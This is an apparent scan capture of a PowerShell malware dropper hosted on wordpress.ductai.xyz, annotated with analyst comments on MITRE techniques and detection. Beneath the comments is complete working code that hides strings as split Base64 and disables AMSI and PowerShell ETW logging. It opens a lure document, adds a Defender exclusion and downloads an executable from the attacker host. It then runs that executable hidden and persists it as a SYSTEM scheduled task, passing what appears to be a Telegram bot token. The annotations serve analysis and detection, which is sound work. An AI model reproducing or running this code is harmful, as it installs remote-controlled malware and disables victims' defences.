wordpress.ductai.xyz
2606:4700:3031::6815:428c  Public Scan

URL: https://wordpress.ductai.xyz/file/ps/iy2m3.ps1
Submission: On October 30 via manual from NL — Scanned from NL

Form analysis 0 forms found in the DOM

Text Content

# String table of the captured script (annotated for analysis).
# Every literal the script needs is Base64-encoded and cut into two fragments that are
# concatenated only at the point of use, so plain-text matching on the file does not see the
# type names, paths or URLs (MITRE ATT&CK T1027). Several variables are never referenced by
# the visible code; they hold alternative splits of the same strings and act as padding.
# For detection, decode and join the fragments before matching rather than searching for
# the Base64 text itself, since the split points can be changed freely.

# Not referenced later: alternative split of the argument string built from $tndtykwd + $liwpfdn.
$xnnsdmvr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("d1lzUExOU043NHNuTXB2aGtFQTVpRHRlbG8gLTEwMDE0MDczMjEzMzEgbWFuaA=="));
$fzadkis=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NTY4OTMyNTQzNzpBQUVXa3RDQlg="));
# Not referenced later: alternative split of the payload path.
$eaevkotyf=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bXBcc3Zjekhvc3QuZXhl"));
$aadhy=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2luZG93c1xUZQ=="));
# $pndoyulqwh + $afhwmylqrc -> "Windows helper" (scheduled-task description).
$afhwmylqrc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aW5kb3dzIGhlbHBlcg=="));
$pndoyulqwh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Vw=="));
# Not referenced later: alternative split of the task name.
$xxtzmdt=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("cnZpY2VtYW5o"));
$qqxkh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("elNl"));
# $itukikafr + $qeyzidhcu -> "zServicemanh" (scheduled-task name).
$qeyzidhcu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Y2VtYW5o"));
$itukikafr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("elNlcnZp"));
# $jylyzzdin + $vankdpt -> "SYSTEM" (account the scheduled task runs as).
$vankdpt=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WVNURU0="));
$jylyzzdin=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Uw=="));
# $tndtykwd + $liwpfdn -> command-line argument handed to the dropped executable: three
# space-separated fields. NOTE(review): the first has the digits:token shape of a Telegram bot
# token and the second the negative numeric form of a chat/channel id; the third is the tag
# "manh". Inferred from format only; confirm against the binary before treating it as the C2 channel.
$liwpfdn=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NDM3OkFBRVdrdENCWHdZc1BMTlNONzRzbk1wdmhrRUE1aUR0ZWxvIC0xMDAxNDA3MzIxMzMxIG1hbmg="));
$tndtykwd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("NTY4OTMyNQ=="));
# Not referenced later: alternative split of the payload path.
$ohwhmlzn=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b3dzXFRlbXBcc3Zjekhvc3QuZXhl"));
$xbsfhlum=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2luZA=="));
# $jofxtlmr + $jtimnyjd -> "C:\Windows\Temp\svczHost.exe" (where the payload is written and run from).
$jtimnyjd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZG93c1xUZW1wXHN2Y3pIb3N0LmV4ZQ=="));
$jofxtlmr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2lu"));
# $lmzplou + $lwzgfssr -> "https://wordpress.ductai.xyz/bdata/data" (payload download URL).
$lwzgfssr=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dHRwczovL3dvcmRwcmVzcy5kdWN0YWkueHl6L2JkYXRhL2RhdGE="));
$lmzplou=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aA=="));
# $upznnngzwx + $luuaoyxzj -> "C:\Windows\Temp" (path added to the Defender exclusion list).
$luuaoyxzj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("b3dzXFRlbXA="));
$upznnngzwx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QzpcV2luZA=="));
# Not referenced later: alternative splits of "Windows Defender", "AntivirusProduct" and
# "Root\SecurityCenter2" ($qogxw is an empty string).
$kxglpysgm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("d3MgRGVmZW5kZXI="));
$ybqoc=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("V2luZG8="));
$xetisjwgai=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QW50aXZpcnVzUHJvZHVjdA=="));
$qogxw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$avifdw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("cml0eUNlbnRlcjI="));
$jklsepa=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Um9vdFxTZWN1"));
# $lfhgyev + $nxqiw -> "Windows Defender" (displayName compared in the WMI query).
$nxqiw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bmRvd3MgRGVmZW5kZXI="));
$lfhgyev=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("V2k="));
# $dxduw + $xjeonilch -> "AntivirusProduct" (WMI class).
$xjeonilch=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bnRpdmlydXNQcm9kdWN0"));
$dxduw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("QQ=="));
# $kxcxen + $qemcyvrjb -> "Root\SecurityCenter2" (WMI namespace).
$qemcyvrjb=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZWN1cml0eUNlbnRlcjI="));
$kxcxen=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Um9vdFxT"));
# $lymgzzo + $nglnoo -> "https://wordpress.ductai.xyz/file/doc/manh/8c47cd0dec8ec072641758bc5cb882f0.docx"
# (URL of the .docx that is downloaded and opened).
$nglnoo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("L3dvcmRwcmVzcy5kdWN0YWkueHl6L2ZpbGUvZG9jL21hbmgvOGM0N2NkMGRlYzhlYzA3MjY0MTc1OGJjNWNiODgyZjAuZG9jeA=="));
$lymgzzo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("aHR0cHM6Lw=="));
# $wulos + $yvzrxpujh -> "8c47cd0dec8ec072641758bc5cb882f0.docx" (file name used under the temp folder).
$yvzrxpujh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZWMwNzI2NDE3NThiYzVjYjg4MmYwLmRvY3g="));
$wulos=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("OGM0N2NkMGRlYzg="));
# Not referenced later: alternative split of "NonPublic,Static".
$lsjippv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bGljLFN0YXRpYw=="));
$opzltv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVi"));
# $ktkpyz + $weelyluwj -> "etwProvider"; $tsrdvjof + $doerm ->
# "System.Management.Automation.Tracing.PSEtwLogProvider" (field and type read by reflection).
$weelyluwj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZXR3UHJvdmlkZXI="));
$ktkpyz=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$doerm=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlRyYWNpbmcuUFNFdHdMb2dQcm92aWRlcg=="));
$tsrdvjof=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdA=="));
# $zrwnxu + $hrhhnw -> "NonPublic,Instance"; $htyltptbj + $xwhiqo -> "m_enabled".
$hrhhnw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YmxpYyxJbnN0YW5jZQ=="));
$zrwnxu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHU="));
$xwhiqo=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bmFibGVk"));
$htyltptbj=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("bV9l"));
# $cgcdzen + $coujxzipp -> "System.Diagnostics.Eventing.EventProvider";
# $vicqbarw + $cbfhvmtho -> "System.Core" (the first half of each pair is an empty string).
$coujxzipp=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkRpYWdub3N0aWNzLkV2ZW50aW5nLkV2ZW50UHJvdmlkZXI="));
$cgcdzen=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
$cbfhvmtho=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLkNvcmU="));
$vicqbarw=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(""));
# $gwhkvgvqy + $frqewi -> "NonPublic,Static" (binding flags for the reflection lookups).
$frqewi=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YyxTdGF0aWM="));
$gwhkvgvqy=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("Tm9uUHVibGk="));
# $jlolivymyu + $nsmssqszqd -> "amsiInitFailed";
# $qxpigx + $oteposte -> "System.Management.Automation.AmsiUtils".
$nsmssqszqd=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("dEZhaWxlZA=="));
$jlolivymyu=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("YW1zaUluaQ=="));
$oteposte=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZW50LkF1dG9tYXRpb24uQW1zaVV0aWxz"));
$qxpigx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("U3lzdGVtLk1hbmFnZW0="));
# Defense tampering inside the current PowerShell process (MITRE ATT&CK T1562.001 / T1562.006).
# Both statements use .NET reflection on non-public fields; the type and field names are
# assembled from Base64 fragments, so they never appear as plain text in the script.
#
# Statement 1: the fragments decode to the type System.Management.Automation.AmsiUtils and its
# non-public static field amsiInitFailed, which is set to $true. The evident intent is that
# content evaluated later in this process is no longer submitted to the antimalware scan interface.
[Ref].Assembly.GetType(($qxpigx + $oteposte)).GetField(($jlolivymyu + $nsmssqszqd),($gwhkvgvqy + $frqewi)).SetValue($null,$true);
# Statement 2: reads the static etwProvider field of
# System.Management.Automation.Tracing.PSEtwLogProvider and sets the m_enabled instance field of
# that System.Diagnostics.Eventing.EventProvider object to 0, i.e. it switches off the ETW
# provider PowerShell uses for its own logging in this process.
# Detection notes: events written by this process after this point may be missing, so do not
# rely on script block logging (event 4104) alone for the rest of the chain; correlate with
# process-creation, file-write, network and scheduled-task telemetry collected outside the
# PowerShell host. Reflection via [Ref].Assembly.GetType(...).GetField(...).SetValue(...)
# combined with Base64-built names is itself a useful hunting pattern.
[Reflection.Assembly]::LoadWithPartialName(($vicqbarw + $cbfhvmtho)).GetType(($cgcdzen + $coujxzipp)).GetField(($htyltptbj + $xwhiqo),($zrwnxu + $hrhhnw)).SetValue([Ref].Assembly.GetType(($tsrdvjof + $doerm)).GetField(($ktkpyz + $weelyluwj),($gwhkvgvqy + $frqewi)).GetValue($null),0);
# Document stage: fetch a .docx into the user's temp folder and open it in a background job.
# The fragments decode to the file name 8c47cd0dec8ec072641758bc5cb882f0.docx and the URL
# https://wordpress.ductai.xyz/file/doc/manh/8c47cd0dec8ec072641758bc5cb882f0.docx.
# NOTE(review): presumably a lure shown to the user while the rest of the script runs; the
# document's content is not visible here, so confirm by examining the file.
$fileName = ($wulos + $yvzrxpujh)
$tempFolder = [System.IO.Path]::GetTempPath();
$filePath = Join-Path -Path $tempFolder -ChildPath $fileName
$fileUrl = ($lymgzzo + $nglnoo);
# Script block executed by Start-Job, which runs it in a separate background PowerShell
# process; expect a child powershell process of the original host in process telemetry.
$scriptBlock = {
    param (
        [string]$filePath,
        [string]$fileUrl
    )
    
    # Download only when the file is not already present, so a re-run produces no second request.
    if (-not (Test-Path -Path $filePath)) {
        
        
        Invoke-WebRequest -Uri $fileUrl -OutFile $filePath
    }
    
    # Opens the file with whatever application is registered for its extension.
    Start-Process -FilePath $filePath
}
$job = Start-Job -ScriptBlock $scriptBlock -ArgumentList $filePath, $fileUrl
# Both branches are empty; NOTE(review): looks like status output was stripped from the
# script before deployment. The check has no effect as written.
if ($job.State -eq 'Running') {
} else {
}
# Security-product check and Defender exclusion (MITRE ATT&CK T1518.001 / T1562.001).
# Both queries read the WMI class AntivirusProduct in namespace Root\SecurityCenter2 (names
# decoded from the fragments) and split the registered products by displayName:
# "Windows Defender" versus anything else.
$windowsDefender = Get-WmiObject -Namespace ($kxcxen + $qemcyvrjb) -Class ($dxduw + $xjeonilch) | Where-Object { $_.displayName -eq ($lfhgyev + $nxqiw) }
$otherAntivirus = Get-WmiObject -Namespace ($kxcxen + $qemcyvrjb) -Class ($dxduw + $xjeonilch) | Where-Object { $_.displayName -ne ($lfhgyev + $nxqiw) }
# $isRunning decides whether the script continues; despite the name it does not describe a
# running process.
$isRunning = $false;
if ($windowsDefender -ne $null) {
    # Defender is registered: continue, and first add C:\Windows\Temp (decoded) to Defender's
    # exclusion paths so files written there are not scanned. Add-MpPreference needs
    # administrative rights, so the script evidently expects to run elevated.
    # Detection: Defender configuration-change event 5007 in the
    # Microsoft-Windows-Windows Defender/Operational log, or a new value under the Defender
    # Exclusions\Paths registry key. Mitigation: tamper protection and centrally managed
    # exclusion lists with local merge disabled.
    $isRunning = $true;
    Add-MpPreference -ExclusionPath ($upznnngzwx + $luuaoyxzj);
} elseif ($otherAntivirus -ne $null) {
    # Defender is not registered but another product is: $isRunning stays $false and the
    # script exits below without downloading the executable.
    
} else {
    # No antivirus product registered at all: continue.
    $isRunning = $true;
}
 
if($isRunning -eq $false) {
    exit;
}
# Download-FileWithRetry: fetch $url to $destination with System.Net.WebClient, retrying on
# any failure.
#   -url                  source URL
#   -destination          local file path to write
#   -maxRetries           maximum number of attempts (default 30)
#   -retryDelayInSeconds  pause between attempts (default 5)
# Returns nothing. All exceptions are swallowed and the final failure branch is empty, so the
# caller cannot tell whether the file was written. No hash or signature check is made on the
# downloaded content.
# Detection: a failing download shows up as up to 30 requests to the same URL at roughly
# five-second intervals from a PowerShell process.
function Download-FileWithRetry {
    param (
        [string]$url,
        [string]$destination,
        [int]$maxRetries = 30,
        [int]$retryDelayInSeconds = 5
    )
    $retryCount = 0
    $downloadSucceeded = $false
    while ($retryCount -lt $maxRetries -and -not $downloadSucceeded) {
        try {
            
            # An existing file at the destination ends the function at once: nothing is
            # downloaded and the existing file is left as it is.
            if (Test-Path -Path $destination -PathType Leaf) {
                return
            }
            
            # A new WebClient is created per attempt and never disposed.
            $webClient = New-Object System.Net.WebClient
            $webClient.DownloadFile($url, $destination)
            
            # Success is judged only by the file existing afterwards.
            if (Test-Path -Path $destination -PathType Leaf) {
                $downloadSucceeded = $true
            } else {
            }
        }
        catch [System.Net.WebException] {
            # Network errors are ignored; the loop retries.
            
        }
        catch {
            # Every other error is ignored as well.
            
        }
        
        if (-not $downloadSucceeded) {
            $retryCount++
            # Sleep only when another attempt will follow.
            if ($retryCount -lt $maxRetries) {
                Start-Sleep -Seconds $retryDelayInSeconds
            }
        }
    }
    # Empty branch: exhaustion of all retries is not reported.
    if (-not $downloadSucceeded) {
    }
}
# Payload stage: download, persist, execute (MITRE ATT&CK T1105, T1053.005, T1036).
# Decoded values used below:
#   URL          https://wordpress.ductai.xyz/bdata/data
#   file         C:\Windows\Temp\svczHost.exe   (name resembles the legitimate svchost.exe)
#   task name    zServicemanh, description "Windows helper"
#   run-as       SYSTEM, highest run level
#   argument     token-like string, numeric id and the tag "manh"
#                NOTE(review): the first two fields have the format of a Telegram bot token
#                and chat id; inferred from shape only, confirm against the binary.
Download-FileWithRetry -url ($lmzplou + $lwzgfssr) -destination ($jofxtlmr + $jtimnyjd)
# Persistence: a scheduled task that starts the executable with the same argument at every
# logon, as SYSTEM, also when the machine is on battery power.
# Detection: task-creation events (Security 4698 when object-access auditing is on, Task
# Scheduler operational 106), a task whose action points into C:\Windows\Temp, and a
# SYSTEM-level task registered from a PowerShell process.
$action = New-ScheduledTaskAction -Execute ($jofxtlmr + $jtimnyjd) -Argument ($tndtykwd + $liwpfdn)
$principal = New-ScheduledTaskPrincipal -UserId ($jylyzzdin + $vankdpt) -RunLevel Highest
$trigger = New-ScheduledTaskTrigger -AtLogOn
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
# Any existing task of the same name is removed first, so re-running the script replaces it.
Unregister-ScheduledTask -TaskName ($itukikafr + $qeyzidhcu) -Confirm:$false
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName ($itukikafr + $qeyzidhcu) -Description ($pndoyulqwh + $afhwmylqrc)
# Immediate first run with a hidden window, without waiting for the next logon. The argument
# is visible in process-creation logs (command-line auditing), which makes it a stable indicator.
Start-Process -WindowStyle hidden -FilePath ($jofxtlmr + $jtimnyjd) -ArgumentList ($tndtykwd + $liwpfdn) 
# Wait for the background document job to finish, then discard it.
Wait-Job $job
Remove-Job $job